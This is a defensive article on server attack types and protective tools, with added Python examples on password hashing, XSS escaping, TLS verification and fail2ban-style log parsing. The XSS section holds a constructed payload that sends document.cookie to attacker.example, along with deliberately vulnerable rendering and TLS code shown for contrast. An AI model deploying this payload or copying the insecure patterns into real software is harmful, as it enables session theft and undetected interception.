Proven tools to protect your server from attacks
The security of the entire company depends to a large extent on the security of its servers. If we neglect it, attackers can steal important data, exposing the company to measurable losses (and, if it is sensitive client data, to reputational damage as well). We also risk malware infection or the website being taken offline. How do we defend against cyberattacks?
Below we propose tools that can help. Let's start by presenting the types of attacks that can be carried out on a server or on the services running on it.
What types of server attacks are there? 7 examples
- DoS and DDoS
A DoS (Denial of Service) attack overloads the server with a huge number of simultaneous requests: a sudden spike in traffic generated not by real visitors but by the attacker's bots. The server cannot cope with the volume and the website stops responding.
In a DDoS (Distributed Denial of Service) attack the traffic comes from many different locations. Attackers carry it out using botnets, networks of computers and other devices (often tens of thousands of machines or more) that they have infected with malware. The infected machines send traffic to the target without their owners ever noticing. A large DDoS cannot be stopped on the server alone, because the link is saturated before the packets reach it; the practical defence is upstream filtering by the hosting provider or a DDoS mitigation service.
- Brute force
A brute force attack is an attempt to guess a user's (usually the administrator's) password by submitting one candidate after another. The attacker's software tries every possible combination of a given length and, once those are exhausted, moves on to longer ones, so every extra character multiplies the work. The defence is strong passwords (at least a dozen or so characters, mixing upper and lower case letters, digits and special characters) combined with software that blocks access to the service after too many failed login attempts (this does not fully eliminate the problem for easy passwords, but it slows the attacker down enormously). Multi-factor authentication, where the service supports it, removes most of the remaining risk. A brute force attack can also take the form of a dictionary attack: instead of trying all combinations, the attacker feeds the service words, and common variations of them, from a prepared dictionary, often a list of passwords leaked in earlier breaches. The best practice is therefore to use a unique, randomly generated password for each service and keep them in a password manager (e.g. KeePass, Bitwarden).
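To show why a "complex-looking" password still falls to a dictionary attack while a randomly generated one does not, here is an added example (not from the original article). It stores passwords the way a server should, salted and hashed with PBKDF2 from Python's standard library, then runs a constructed wordlist with a few common mutations against two accounts. The wordlist, the iteration count and the account passwords are all illustrative values chosen for this example.

```python
import hashlib
import os
import secrets
import string
from typing import Iterator, List, Optional

# Kept low so the demo runs in seconds; real deployments use a far higher
# work factor (or Argon2/bcrypt), which is exactly what slows the attacker down.
ITERATIONS = 20_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256, a standard slow password hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(password: str) -> dict:
    """What a server stores: a random per-user salt and the hash, never the password."""
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


def verify(record: dict, candidate: str) -> bool:
    """Constant-time comparison so timing does not leak how close a guess was."""
    return secrets.compare_digest(record["hash"], hash_password(candidate, record["salt"]))


def mutations(word: str) -> Iterator[str]:
    """Cheap variations that cracking tools try for every dictionary word."""
    for base in (word, word.capitalize()):
        for suffix in ("", "1", "123", "!"):
            yield base + suffix


def dictionary_attack(record: dict, wordlist: List[str]) -> Optional[str]:
    """Return the password if any dictionary word (or mutation) matches, else None."""
    for word in wordlist:
        for guess in mutations(word):
            if verify(record, guess):
                return guess
    return None


def random_password(length: int = 20) -> str:
    """The kind of password a password manager generates: random, long, unique."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


# Constructed stand-in for a leaked-password list
WORDLIST = ["admin", "password", "letmein", "welcome", "qwerty", "summer"]

weak_record = make_record("Welcome123")          # mixed case and digits, still a dictionary word
strong_record = make_record(random_password())   # 20 random characters

if __name__ == "__main__":
    print("weak account cracked with:", dictionary_attack(weak_record, WORDLIST))
    print("strong account cracked with:", dictionary_attack(strong_record, WORDLIST))
```

The weak account is recovered after a few dozen hash computations even though its password satisfies the usual "upper, lower, digit" rules; the random one survives the whole list, and against a full brute force the 20-character alphabet makes the search infeasible regardless of the hash used.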
- SQL Injection
SQL is the language used to manage data in relational databases (retrieving, inserting, updating and deleting it). Whenever a user interacts with an application or website, its source code builds SQL queries and sends them to the database to fetch or modify the data the user is working with.
SQL injection is the insertion of unauthorized SQL into such a query by manipulating the data sent to the server (typically a form field or URL parameter), so that the attacker's text is executed as part of the query. In this way an attacker can, for example, read other users' records, obtain logins and password hashes, modify data, or even delete the entire database. The attack is possible when the application concatenates untrusted input into the SQL text; the fix is to build every query with parameterized (prepared) statements, so that input is always treated as data and never as SQL, and to give the application's database account only the privileges it actually needs. Vulnerability scanners and security audits by specialists help to find the places where this was not done.
- Cross-site scripting (XSS)
Like SQL injection, cross-site scripting exploits gaps on the front-end side of an application (the part visible to the user), typically data that is displayed to other users without proper escaping. The attacker injects HTML or JavaScript that then runs in the victims' browsers with the privileges of the site itself: it can steal session cookies, perform actions on the user's behalf, or deface the page. The primary defence is to escape all untrusted data for the context in which it is output (HTML body, attribute, JavaScript, URL), backed by a Content-Security-Policy header and HttpOnly session cookies. Vulnerability scanners also help here.
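As an added example (not from the original article), here is the failure and its fix in Python for the HTML body context: one renderer pastes a user's comment straight into the page, the other runs it through `html.escape` first. The comment payload and the CSP value are constructed for the demo.

```python
import html


def render_comment_vulnerable(author: str, body: str) -> str:
    # VULNERABLE: untrusted strings are pasted straight into the page, so a
    # comment containing <script> becomes part of the page's own code and
    # runs in every visitor's browser.
    return f'<p class="comment"><b>{author}</b>: {body}</p>'


def render_comment_safe(author: str, body: str) -> str:
    # Output encoding: html.escape turns < > & " ' into entities, so the
    # browser displays the text but never parses it as markup. Because it
    # also escapes quotes, the same call is safe inside a quoted attribute.
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</p>'


def contains_script_tag(fragment: str) -> bool:
    """Crude check used by the demo: is there a live <script> tag in the output?"""
    return "<script" in fragment.lower()


# Constructed stored-XSS payload of the kind that exfiltrates session cookies
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

# Defence in depth: even if one escape is forgotten, this policy stops inline
# scripts from running (constructed example value; tune it to your site).
CONTENT_SECURITY_POLICY = "default-src 'self'; script-src 'self'; object-src 'none'"

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
```

Escaping is context-specific: `html.escape` is correct for text and quoted attributes, but a value placed inside a `<script>` block or a URL needs the encoding for that context, which is why templating engines that auto-escape per context are preferable to hand-built strings.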
- Man-in-the-middle (MITM)
In a MITM (man-in-the-middle) attack the attacker places himself between two communicating parties on the network (hence the name) and eavesdrops on the traffic. Messages can not only be read but also modified before they reach the intended recipient. The defence is strong encryption with authentication of the endpoints: TLS (HTTPS, formerly called SSL) with proper certificate verification, or a VPN between the two nodes. Encryption alone is not enough; a client that accepts any certificate is still open to an attacker who terminates the connection with his own.
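The weak setting and the corrected one side by side, as an added example using Python's standard `ssl` module (not code from the original article). No connection is made; the block only builds the two client configurations and reports the settings that decide whether a man-in-the-middle would be noticed.

```python
import ssl


def insecure_client_context() -> ssl.SSLContext:
    """WEAK: the link is encrypted, but any certificate is accepted.

    An attacker in the middle can terminate TLS with his own certificate,
    read and modify the traffic, and the client never notices. This is the
    'verify=False' shortcut that quietly ends up in production code.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be switched off before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Verifies the server's certificate chain against the system trust store,
    checks that the certificate matches the hostname, and refuses TLS versions
    older than 1.2 (protocol downgrade is a classic MITM move)."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext) -> dict:
    """Summarise the settings that decide whether a MITM would be detected."""
    return {
        "verifies_certificate": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": ctx.check_hostname,
        "min_tls": ctx.minimum_version.name,
    }


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_client_context()))
    print("hardened:", audit_context(hardened_client_context()))
    # To use it: hardened_client_context().wrap_socket(sock, server_hostname="example.com")
```

The same `audit_context` check is a useful thing to grep for in code review: any place that sets `verify_mode = CERT_NONE` or `check_hostname = False` is a place where the "encrypted" connection offers no protection against an active attacker.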
- DNS hijacking
This attack redirects the user to a website created by the attackers that looks like the original. The visitor does not realise they have landed on a dangerous site, because they typed a known and trusted address. In this way criminals can, for example, steal login or credit card details. The defence is to keep the software that serves your DNS zones free of vulnerabilities, to use a reputable DNS provider and registrar (with multi-factor authentication and a registrar lock on the account, since stolen provider credentials are a common way to hijack a zone), and to sign the zone with DNSSEC so that resolvers can detect forged answers.
- Malware
Malware is software that attackers install on servers and users' computers to carry out actions on their behalf. There are many kinds of malware, including viruses, bots, spyware, Trojans and ransomware.
One popular method of spreading malware is the so-called drive-by attack. The attacker plants a script in a poorly secured website that exploits vulnerabilities in visitors' browsers or plugins; a visitor whose browser is out of date, and who has no antivirus/antimalware protection, downloads the malware onto their device automatically, without clicking anything. Keeping browsers and plugins updated matters as much as antivirus here.
Useful tools to protect your server from attacks
- Snort (open source)
Snort analyzes network traffic in real time. It helps prevent intrusions by detecting anomalies and known attack patterns using rules, both the published rulesets and rules you write yourself.
When a rule matches, an alert is raised and, if Snort is deployed inline as an IPS rather than in passive IDS mode, it can also drop the offending packets. It can see the content of the traffic because it works as a packet sniffer, capturing the transmitted data directly from the network interface.
- Avast Server Antivirus
Avast Server Antivirus relies on cloud-based threat intelligence and machine learning to detect attacks on servers. It sends alerts to administrators so that they can assess whether there is a real threat, and it generates detailed reports.
The software also scans email to filter out dangerous messages and includes a VPN and a data shredder. Management is simple and intuitive.
- ClamAV (open source)
ClamAV is a free, signature-based virus scanner. Its clamd daemon is multi-threaded and, combined with the on-access scanning component, can protect the server in real time even under heavy load; the clamscan command-line tool is for on-demand scans.
It is cross-platform, so it can run on machines with different operating systems on the same network. Virus and malware signatures are updated automatically by freshclam, which keeps detection current. It can be used from the command line or through the ClamTk graphical interface. Being signature-based, it is strong against known malware but should not be the only line of defence against new or targeted samples.
- Zabbix (open source)
Zabbix is an advanced tool for monitoring server performance and availability. You define triggers, and the software sends notifications whenever a metric deviates from the server's normal, stable operation.
With it we can monitor any service running on the server, both whether it is working and how much of the server's resources it consumes. This helps to detect attacks whose goal is to destabilize the server, such as DoS, and to react quickly when a service becomes unavailable. The same data is also very useful for optimizing the performance of the server and the applications running on it.
- Wireshark (open source)
Wireshark is a free network protocol analyzer that excels at network troubleshooting and monitoring. It captures packets and lets you inspect their contents to identify suspicious traffic.
It can capture data reaching the server from various interfaces: Ethernet, Wi-Fi, Bluetooth or USB. For a new user it can be a bit difficult and takes some effort to master, but the large community around it helps. Bear in mind that Wireshark is a manual analysis tool rather than an always-on defence; for unattended capture on a server, its command-line companion tshark is more practical.
- OpenVAS (open source)
OpenVAS is a vulnerability scanner, i.e. a tool that detects weaknesses in systems that attackers could use to carry out an attack. The software is able to detect around 26,000 types of vulnerabilities.
The big advantage of OpenVAS is an active community of developers who improve the tool and write vulnerability tests (plugins) for it. Plugins let you tailor it to your needs, which makes it very versatile. Scan only systems you own or have written permission to test; a vulnerability scan looks exactly like reconnaissance to whoever receives it.
- Nessus (paid)
Nessus is a commercial alternative to OpenVAS. It stands out for its very low rate of false positives, which significantly reduces the workload of server administrators.
Nessus detects software flaws and misconfigurations in operating systems and network devices. Unlike OpenVAS, it comes with pre-configured scan policies and templates for various types of IT assets. It detects 50,000 types of vulnerabilities and supports 130,000 plugins. Its disadvantage is the high price.
- Sentry (open source)
Sentry monitors applications running on the server. It records every error the running application raises and notifies predefined people (usually technical and project management staff).
The tool is very helpful in responding quickly to application malfunctions. Technical staff do not have to review logs continuously, because the software does it for them, reporting errors in real time as they appear.
Additional advantages are the grouping of identical errors, the extra context recorded for each one (browser, IP address, request data, etc.), and the clear presentation in a graphical interface instead of raw log files.
Sentry is not a vulnerability scanner, but a sudden burst of errors, especially ones triggered by malformed or unexpected input, is often the first sign that somebody is deliberately probing the application, so it is worth routing such alerts to whoever handles security. Make sure the context it captures does not include passwords, tokens or other secrets.
- Nmap (open source)
Nmap is a tool for port scanning, detecting hosts and the services running on them, network mapping and, through its NSE scripts, basic vulnerability checks. It is the recognized standard for these tasks.
Security vulnerabilities can be discovered during network penetration testing, a kind of controlled attack on your own network that tests how it would stand up to real criminals. Nmap is the natural starting point: scan your own servers regularly and compare the result with the list of ports you expect to be open.
The tool runs on multiple operating systems and is easy to use. It can be operated both from the command line and through the Zenmap graphical interface. A large community of developers has grown around Nmap, so the program is constantly updated.
- Fail2ban (open source)
Fail2ban reads the logs of services that accept connections (sshd, web servers, mail servers) and matches them against patterns defined by the administrator. When an IP address produces too many matches within a given time window, it is blocked, temporarily or permanently, by adding a firewall rule. This counters brute-force attacks on specific services and applications. Against DDoS it offers only limited relief, since it can block only after the packets have already reached the server and been logged.
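To show what fail2ban actually computes from a log, here is an added Python example (not fail2ban's own code) that implements its maxretry/findtime logic over a few constructed sshd lines in the syslog format found in /var/log/auth.log. One address fails five times within seconds; another fails twice, twenty minutes apart, and should not be banned. The year is assumed because syslog timestamps do not carry one.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterator, Tuple

# Constructed sample lines; 203.0.113.7 hammers the server, 192.0.2.55 fails
# twice twenty minutes apart, and one line is a legitimate key login.
SAMPLE_LOG = """\
Mar 10 12:00:01 web1 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51322 ssh2
Mar 10 12:00:03 web1 sshd[1203]: Failed password for root from 203.0.113.7 port 51330 ssh2
Mar 10 12:00:04 web1 sshd[1205]: Accepted publickey for deploy from 198.51.100.20 port 40100 ssh2
Mar 10 12:00:06 web1 sshd[1207]: Failed password for invalid user test from 203.0.113.7 port 51340 ssh2
Mar 10 12:00:07 web1 sshd[1209]: Failed password for root from 192.0.2.55 port 60000 ssh2
Mar 10 12:00:09 web1 sshd[1211]: Failed password for invalid user oracle from 203.0.113.7 port 51350 ssh2
Mar 10 12:00:10 web1 sshd[1213]: Failed password for root from 203.0.113.7 port 51360 ssh2
Mar 10 12:20:00 web1 sshd[1300]: Failed password for root from 192.0.2.55 port 60010 ssh2
"""

# Equivalent of a fail2ban "failregex" for the sshd failed-password line
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for .* from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(log_text: str, year: int = 2024) -> Iterator[Tuple[datetime, str]]:
    """Yield (timestamp, source IP) for every failed-password line.

    Syslog lines carry no year, so one is assumed (an illustrative value here)."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"]


def find_offenders(log_text: str, maxretry: int = 5, findtime_seconds: int = 600) -> Dict[str, datetime]:
    """Sliding-window count per IP, the same logic as fail2ban's maxretry/findtime.

    Returns {ip: time at which the ban would be triggered}."""
    window = timedelta(seconds=findtime_seconds)
    recent: Dict[str, deque] = defaultdict(deque)
    banned: Dict[str, datetime] = {}
    for ts, ip in parse_failures(log_text):
        if ip in banned:
            continue                 # already blocked at the firewall
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()              # forget failures older than findtime
        if len(q) >= maxretry:
            banned[ip] = ts
    return banned


if __name__ == "__main__":
    for ip, when in find_offenders(SAMPLE_LOG).items():
        print(f"{when:%H:%M:%S} ban {ip} (fail2ban would add a firewall rule here)")
```

Two things the example makes visible: the window matters (with the default ten minutes 192.0.2.55 is never banned, with a one-hour window it is), and a slow attacker who spaces attempts just beyond findtime slips under the threshold, which is why the lockout should be combined with keys instead of passwords rather than relied on alone.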
Hackers don't sleep - prepare your server for them
The number of cyberattacks continues to grow. Attackers keep refining their methods, and server security specialists must keep up. Criminals are increasingly using artificial intelligence and machine learning, which makes effective attacks easier to carry out.
It is therefore absolutely necessary to monitor the network continuously, detect server vulnerabilities and protect against viruses and malware. The tools above can be an effective weapon against attackers, as confirmed by their popularity among developers around the world.
However, in addition to the right software, basic hardening measures matter just as much, such as:
- using strong passwords and, preferably, SSH keys (with password logins disabled) to connect to the server
- restricting access to critical services to a specific pool of IP addresses (preferably through a VPN)
- constantly updating the software running on the server and upgrading the libraries used by the applications installed on it
- following security advisories and CVE feeds for the software you run, so that you can react quickly to 0-day vulnerabilities affecting your server or application
- keeping current, tested backups stored separately from the server
- using non-default server configurations (e.g. a non-standard port for SSH connections); this cuts the noise from automated scanners but is not a substitute for the measures above, since a port scan finds the service anyway
- closing every port you do not need and restricting the rest with a firewall
It should also be remembered that the weakest link in security is often... the human. Be careful, especially if you administer a particular server or application, because attackers frequently exploit the human factor to gain unauthorized access.
Always pay attention to what you click on and what you tell other people; apply the principle of limited trust and verify that those who contact you are who they claim to be. Otherwise we can expose ourselves to serious problems.